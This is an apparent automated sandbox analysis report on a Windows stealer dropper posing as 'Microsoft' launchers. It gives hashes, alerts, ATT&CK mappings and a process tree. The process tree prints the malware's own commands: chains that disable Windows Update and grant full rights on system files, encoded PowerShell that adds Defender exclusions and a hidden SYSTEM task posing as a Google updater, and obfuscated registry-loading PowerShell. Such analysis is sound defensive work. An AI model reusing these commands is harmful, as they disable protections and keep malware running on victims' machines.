c500fecde8b41e100ed5bcfdaf6b6047e4e1958e69c693869772147316bea289

General

Target

c500fecde8b41e100ed5bcfdaf6b6047e4e1958e69c693869772147316bea289.exe
Size

7.2MB
MD5

ba37036e2cdabffac8104c8bb68a697c
SHA1

9e90bc0443ef5a309717fdf3ffb73b732f59bd9b
SHA256

c500fecde8b41e100ed5bcfdaf6b6047e4e1958e69c693869772147316bea289
SHA512

4ea81b2afce1f841d4c391027a2a56de18dd40705a52a3c0cd75099017254aeb300391f5f2d57f3f706ea73bebe8f8962b699b17894f9b53d0fa725e65c2567f

Score

10^/10

discovery evasion exploit spyware stealer suricata upx

Malware Config

Signatures

suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
suricata
Executes dropped EXE 3 IoCs

Processes:

DcMicrosoft.exeDsMicrosoft_Launcher.exeDcMicrosoft_Launcher.exe

pid process

4240 DcMicrosoft.exe
3044 DsMicrosoft_Launcher.exe
3188 DcMicrosoft_Launcher.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

2260 takeown.exe
1296 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
4240	DcMicrosoft.exe
3044	DsMicrosoft_Launcher.exe
3188	DcMicrosoft_Launcher.exe

pid	process
2260	takeown.exe
1296	icacls.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\DsMicrosoft_Launcher.exe	upx
behavioral2/memory/3044-137-0x00007FF66A610000-0x00007FF66AD6A000-memory.dmp	upx
behavioral2/memory/3044-138-0x00007FF66A610000-0x00007FF66AD6A000-memory.dmp	upx

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

c500fecde8b41e100ed5bcfdaf6b6047e4e1958e69c693869772147316bea289.exeDcMicrosoft.exeDcMicrosoft_Launcher.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation	c500fecde8b41e100ed5bcfdaf6b6047e4e1958e69c693869772147316bea289.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation	DcMicrosoft.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation	DcMicrosoft_Launcher.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exetakeown.exe

pid process

1296 icacls.exe
2260 takeown.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Suspicious use of SetThreadContext 1 IoCs

Processes:

DcMicrosoft_Launcher.exe

description pid process target process

PID 3188 set thread context of 3816 3188 DcMicrosoft_Launcher.exe conhost.exe

pid	process
1296	icacls.exe
2260	takeown.exe

description	pid	process	target process
PID 3188 set thread context of 3816	3188	DcMicrosoft_Launcher.exe	conhost.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

4148 sc.exe
1508 sc.exe
4784 sc.exe
3536 sc.exe
1652 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 7 Go-http-client/1.1
Modifies registry key 1 TTPs 8 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

2516 reg.exe
3852 reg.exe
3004 reg.exe
1064 reg.exe
4660 reg.exe
1864 reg.exe
2140 reg.exe
1044 reg.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exeDcMicrosoft_Launcher.exe

pid process

1360 powershell.exe
1360 powershell.exe
3188 DcMicrosoft_Launcher.exe

pid	process
4148	sc.exe
1508	sc.exe
4784	sc.exe
3536	sc.exe
1652	sc.exe

description	flow	ioc
HTTP User-Agent header	7	Go-http-client/1.1

pid	process
2516	reg.exe
3852	reg.exe
3004	reg.exe
1064	reg.exe
4660	reg.exe
1864	reg.exe
2140	reg.exe
1044	reg.exe

pid	process
1360	powershell.exe
1360	powershell.exe
3188	DcMicrosoft_Launcher.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

powershell.exeDcMicrosoft_Launcher.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	1360	powershell.exe
Token: SeDebugPrivilege	3188	DcMicrosoft_Launcher.exe
Token: SeShutdownPrivilege	4804	powercfg.exe
Token: SeCreatePagefilePrivilege	4804	powercfg.exe
Token: SeShutdownPrivilege	1644	powercfg.exe
Token: SeCreatePagefilePrivilege	1644	powercfg.exe
Token: SeShutdownPrivilege	3500	powercfg.exe
Token: SeCreatePagefilePrivilege	3500	powercfg.exe
Token: SeShutdownPrivilege	692	powercfg.exe
Token: SeCreatePagefilePrivilege	692	powercfg.exe

Suspicious use of WriteProcessMemory 47 IoCs

Processes:

c500fecde8b41e100ed5bcfdaf6b6047e4e1958e69c693869772147316bea289.execmd.exeDcMicrosoft.exeDcMicrosoft_Launcher.execmd.execmd.exe

description	pid	process	target process
PID 4828 wrote to memory of 4288	4828	c500fecde8b41e100ed5bcfdaf6b6047e4e1958e69c693869772147316bea289.exe	cmd.exe
PID 4828 wrote to memory of 4288	4828	c500fecde8b41e100ed5bcfdaf6b6047e4e1958e69c693869772147316bea289.exe	cmd.exe
PID 4828 wrote to memory of 4288	4828	c500fecde8b41e100ed5bcfdaf6b6047e4e1958e69c693869772147316bea289.exe	cmd.exe
PID 4288 wrote to memory of 4240	4288	cmd.exe	DcMicrosoft.exe
PID 4288 wrote to memory of 4240	4288	cmd.exe	DcMicrosoft.exe
PID 4288 wrote to memory of 4240	4288	cmd.exe	DcMicrosoft.exe
PID 4240 wrote to memory of 3044	4240	DcMicrosoft.exe	DsMicrosoft_Launcher.exe
PID 4240 wrote to memory of 3044	4240	DcMicrosoft.exe	DsMicrosoft_Launcher.exe
PID 4240 wrote to memory of 3188	4240	DcMicrosoft.exe	DcMicrosoft_Launcher.exe
PID 4240 wrote to memory of 3188	4240	DcMicrosoft.exe	DcMicrosoft_Launcher.exe
PID 3188 wrote to memory of 1360	3188	DcMicrosoft_Launcher.exe	powershell.exe
PID 3188 wrote to memory of 1360	3188	DcMicrosoft_Launcher.exe	powershell.exe
PID 3188 wrote to memory of 4948	3188	DcMicrosoft_Launcher.exe	cmd.exe
PID 3188 wrote to memory of 4948	3188	DcMicrosoft_Launcher.exe	cmd.exe
PID 3188 wrote to memory of 5000	3188	DcMicrosoft_Launcher.exe	cmd.exe
PID 3188 wrote to memory of 5000	3188	DcMicrosoft_Launcher.exe	cmd.exe
PID 3188 wrote to memory of 3816	3188	DcMicrosoft_Launcher.exe	conhost.exe
PID 3188 wrote to memory of 3816	3188	DcMicrosoft_Launcher.exe	conhost.exe
PID 4948 wrote to memory of 4148	4948	cmd.exe	sc.exe
PID 4948 wrote to memory of 4148	4948	cmd.exe	sc.exe
PID 3188 wrote to memory of 3816	3188	DcMicrosoft_Launcher.exe	conhost.exe
PID 3188 wrote to memory of 3816	3188	DcMicrosoft_Launcher.exe	conhost.exe
PID 3188 wrote to memory of 3816	3188	DcMicrosoft_Launcher.exe	conhost.exe
PID 3188 wrote to memory of 3816	3188	DcMicrosoft_Launcher.exe	conhost.exe
PID 3188 wrote to memory of 3816	3188	DcMicrosoft_Launcher.exe	conhost.exe
PID 3188 wrote to memory of 3816	3188	DcMicrosoft_Launcher.exe	conhost.exe
PID 3188 wrote to memory of 3816	3188	DcMicrosoft_Launcher.exe	conhost.exe
PID 3188 wrote to memory of 3816	3188	DcMicrosoft_Launcher.exe	conhost.exe
PID 3188 wrote to memory of 3816	3188	DcMicrosoft_Launcher.exe	conhost.exe
PID 5000 wrote to memory of 4804	5000	cmd.exe	powercfg.exe
PID 5000 wrote to memory of 4804	5000	cmd.exe	powercfg.exe
PID 4948 wrote to memory of 1508	4948	cmd.exe	sc.exe
PID 4948 wrote to memory of 1508	4948	cmd.exe	sc.exe
PID 5000 wrote to memory of 1644	5000	cmd.exe	powercfg.exe
PID 5000 wrote to memory of 1644	5000	cmd.exe	powercfg.exe
PID 4948 wrote to memory of 4784	4948	cmd.exe	sc.exe
PID 4948 wrote to memory of 4784	4948	cmd.exe	sc.exe
PID 5000 wrote to memory of 3500	5000	cmd.exe	powercfg.exe
PID 5000 wrote to memory of 3500	5000	cmd.exe	powercfg.exe
PID 4948 wrote to memory of 3536	4948	cmd.exe	sc.exe
PID 4948 wrote to memory of 3536	4948	cmd.exe	sc.exe
PID 5000 wrote to memory of 692	5000	cmd.exe	powercfg.exe
PID 5000 wrote to memory of 692	5000	cmd.exe	powercfg.exe
PID 4948 wrote to memory of 1652	4948	cmd.exe	sc.exe
PID 4948 wrote to memory of 1652	4948	cmd.exe	sc.exe
PID 4948 wrote to memory of 3004	4948	cmd.exe	reg.exe
PID 4948 wrote to memory of 3004	4948	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\c500fecde8b41e100ed5bcfdaf6b6047e4e1958e69c693869772147316bea289.exe
"C:\Users\Admin\AppData\Local\Temp\c500fecde8b41e100ed5bcfdaf6b6047e4e1958e69c693869772147316bea289.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\builder.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:4288

C:\DcMicrosoft.exe
DcMicrosoft.exe -pDEC2231Q -dC:/
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4240

C:\Users\Admin\AppData\Local\Temp\RarSFX0\DsMicrosoft_Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\DsMicrosoft_Launcher.exe"
4⤵
- Executes dropped EXE
PID:3044

C:\Users\Admin\AppData\Local\Temp\RarSFX0\DcMicrosoft_Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\DcMicrosoft_Launcher.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3188

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaAByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG8AcwBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGkAZgB6AG0AIwA+AA=="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1360

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
- Suspicious use of WriteProcessMemory
PID:4948

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
- Launches sc.exe
PID:4148

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:1508

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
- Launches sc.exe
PID:4784

C:\Windows\system32\sc.exe
sc stop bits
6⤵
- Launches sc.exe
PID:3536

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
- Launches sc.exe
PID:1652

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
6⤵
- Modifies registry key
PID:3004

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
6⤵
- Modifies registry key
PID:1064

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
6⤵
- Modifies registry key
PID:4660

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
6⤵
- Modifies registry key
PID:1864

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
6⤵
- Modifies registry key
PID:2140

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2260

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1296

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1044

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:2516

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:3852

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of WriteProcessMemory
PID:5000

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4804

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1644

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3500

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:692

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
5⤵
- Drops file in Windows directory
PID:3816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdQB4AGwAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEASABrAEEAZAB3AEIAawBBAEgAZwBBAEkAdwBBACsAQQBDAEEAQQBVAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAMABBAFUAQQBCAHkAQQBHADgAQQBZAHcAQgBsAEEASABNAEEAYwB3AEEAZwBBAEMAMABBAFIAZwBCAHAAQQBHAHcAQQBaAFEAQgBRAEEARwBFAEEAZABBAEIAbwBBAEMAQQBBAEoAdwBCAEQAQQBEAG8AQQBYAEEAQgBRAEEASABJAEEAYgB3AEIAbgBBAEgASQBBAFkAUQBCAHQAQQBDAEEAQQBSAGcAQgBwAEEARwB3AEEAWgBRAEIAegBBAEYAdwBBAFIAdwBCAHYAQQBHADgAQQBaAHcAQgBzAEEARwBVAEEAWABBAEIARABBAEcAZwBBAGMAZwBCAHYAQQBHADAAQQBaAFEAQgBjAEEASABVAEEAYwBBAEIAawBBAEcARQBBAGQAQQBCAGwAQQBIAEkAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEwAUQBCAFcAQQBHAFUAQQBjAGcAQgBpAEEAQwBBAEEAVQBnAEIAMQBBAEcANABBAFEAUQBCAHoAQQBDAEEAQQBQAEEAQQBqAEEASABFAEEAYQBRAEIAdABBAEcAVQBBAEkAdwBBACsAQQBBAD0APQAiACcAKQAgADwAIwBvAGIAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwB5AHIAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwB0AGwAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwB5AGkAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABSAGEAcgBTAEYAWAAwAFwARABjAE0AaQBjAHIAbwBzAG8AZgB0AF8ATABhAHUAbgBjAGgAZQByAC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAYgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAPAAjAG4AYgBxAHkAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="
5⤵
PID:4360

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:3584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:3564

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{05beda3c-a2be-4f8f-b8bf-a5142926d01b}
1⤵
PID:3640

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Modify Registry

1

T1112

Credential Access

Credentials in Files

2

T1081

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Data from Local System

2

T1005

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\DcMicrosoft.exe
Filesize
7.0MB

MD5
d7d4f6bee8d6459aa9d6eef2318ed8dd

SHA1
600cddcfdd7f8ba4b68b37d1090f8dd768b6469a

SHA256
56f0724b9d3673f24c0ff64fde1ffaa980818d0f47c8a5e47d8a7713a9cabeaa

SHA512
c053b89e2d18cdd37334c390dc1b2b3d082c6327d3fc5512ac52cfc4cc5eefb08b133877d44f609e0b17608294d3753e217ce65964a5cc33c293a45fe6e14593

Download Submit
C:\DcMicrosoft.exe
Filesize
7.0MB

MD5
d7d4f6bee8d6459aa9d6eef2318ed8dd

SHA1
600cddcfdd7f8ba4b68b37d1090f8dd768b6469a

SHA256
56f0724b9d3673f24c0ff64fde1ffaa980818d0f47c8a5e47d8a7713a9cabeaa

SHA512
c053b89e2d18cdd37334c390dc1b2b3d082c6327d3fc5512ac52cfc4cc5eefb08b133877d44f609e0b17608294d3753e217ce65964a5cc33c293a45fe6e14593

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\DcMicrosoft_Launcher.exe
Filesize
4.5MB

MD5
535d450486505acb3ee1e71351bcf010

SHA1
755b77cdc3e288f295b70c45006aac256e9c0c76

SHA256
bca2056a747263e5bb2475ef321a08860313ae38af43ed8ea8a01652c6039fa5

SHA512
afbcc085a008010159273ec295e39b297c4f857b3bd2e231bd06df40dcd7e6f80ef3ed5190342ca9d04327d53e185fccad4e1c3cf573054746f32f91c98ea328

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\DcMicrosoft_Launcher.exe
Filesize
4.5MB

MD5
535d450486505acb3ee1e71351bcf010

SHA1
755b77cdc3e288f295b70c45006aac256e9c0c76

SHA256
bca2056a747263e5bb2475ef321a08860313ae38af43ed8ea8a01652c6039fa5

SHA512
afbcc085a008010159273ec295e39b297c4f857b3bd2e231bd06df40dcd7e6f80ef3ed5190342ca9d04327d53e185fccad4e1c3cf573054746f32f91c98ea328

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\DsMicrosoft_Launcher.exe
Filesize
2.3MB

MD5
09e7df1b7af441df97311eb490cf6253

SHA1
71542eba588e5500118a46e6918f6b19f9e69b66

SHA256
595142ac0ecaf32e5cd9a477f440bac99b52dcc6c2fa083424d5007fdf0caeec

SHA512
3ffa81253d97ba5317385fbe635038f81ef6b7f50d17c5ab868efb194d0185cc8bc0e2a4ceb576705bc0c9a066df54f7c0ac18ea332f1aa93a51c60fa9d353aa

Download Submit
C:\builder.bat
Filesize
87B

MD5
400aff914f5fd3b04102a90194d2f807

SHA1
7c61e429bafe0028c7255bc28424872ea9f2fc45

SHA256
c58daf681cdf2300a25c95ee7b2962bd92dfc1860a7dac8dc78a81df6f5641b2

SHA512
e27fa92a67dcd4e836cf07b9db51f850b00ce445324e24bf0299258215d068c0204a85b2e6c529a3170740ed0368c6673e25802caae651c612ab989730c4b823

Download Submit
memory/692-163-0x0000000000000000-mapping.dmp

Download
memory/1044-199-0x0000000000000000-mapping.dmp

Download
memory/1064-166-0x0000000000000000-mapping.dmp

Download
memory/1296-181-0x0000000000000000-mapping.dmp

Download
memory/1360-146-0x00007FFB27A20000-0x00007FFB284E1000-memory.dmp

Filesize
10.8MB

Download
memory/1360-144-0x0000000000000000-mapping.dmp

Download
memory/1360-145-0x0000023DCA510000-0x0000023DCA532000-memory.dmp

Filesize
136KB

Download
memory/1360-147-0x00007FFB27A20000-0x00007FFB284E1000-memory.dmp

Filesize
10.8MB

Download
memory/1508-157-0x0000000000000000-mapping.dmp

Download
memory/1644-158-0x0000000000000000-mapping.dmp

Download
memory/1652-164-0x0000000000000000-mapping.dmp

Download
memory/1864-169-0x0000000000000000-mapping.dmp

Download
memory/2140-175-0x0000000000000000-mapping.dmp

Download
memory/2260-177-0x0000000000000000-mapping.dmp

Download
memory/2516-200-0x0000000000000000-mapping.dmp
